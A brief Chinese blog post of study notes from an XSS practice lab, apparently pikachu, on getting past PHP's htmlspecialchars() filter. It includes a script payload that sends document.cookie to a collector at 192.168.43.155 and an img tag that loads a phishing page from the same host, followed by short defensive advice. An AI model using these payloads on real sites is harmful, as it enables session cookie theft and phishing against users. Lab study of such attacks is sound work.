跨站脚本攻击
XSS绕过-关于htmlspecial()函数的绕过
Htmlspecialchars():是PHP中关于预定字符如(&,“,<>,)转义为实体HTML
Htmlspecialchars($string,ENT_COMPAT/ENT_QUOTES/ENT_NOQUOTES)
要过滤的字符 ,可用的引号类型,默认仅编码双引号/编码双引号和单引号/不编码任何引号
绕过构造闭合单引号
Xsscookic
1 |
<script>document.location='http://192.168.43.155/pkxss/xcookie/cookie.php?cookie=' + document.cookie;</script> |
Post cookie
1 |
<html> |
Xfish
1 |
<img src ="http://192.168.43.155/pkxss/xfish/fish.php" /> |
防范
- 页面呈现转移
- 定制策略只允许用户加载某些资源(白名单)
注意
以上资料仅作信息防御技术使用,不得随意尝试,如有尝试,作者概不负责。
学习内容来源于pikachu。
FROM :https://ailumao.cn/ | Author:Ailumao
这是一篇受密码保护的文章,您需要提供访问密码: 密码: 相关推荐: Mybatis-plus框架常见SQL注入场景 一、关于Mybatis-plus MyBatis-Plus (opens new window)(简称 MP)是一个 MyBatis (op…
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论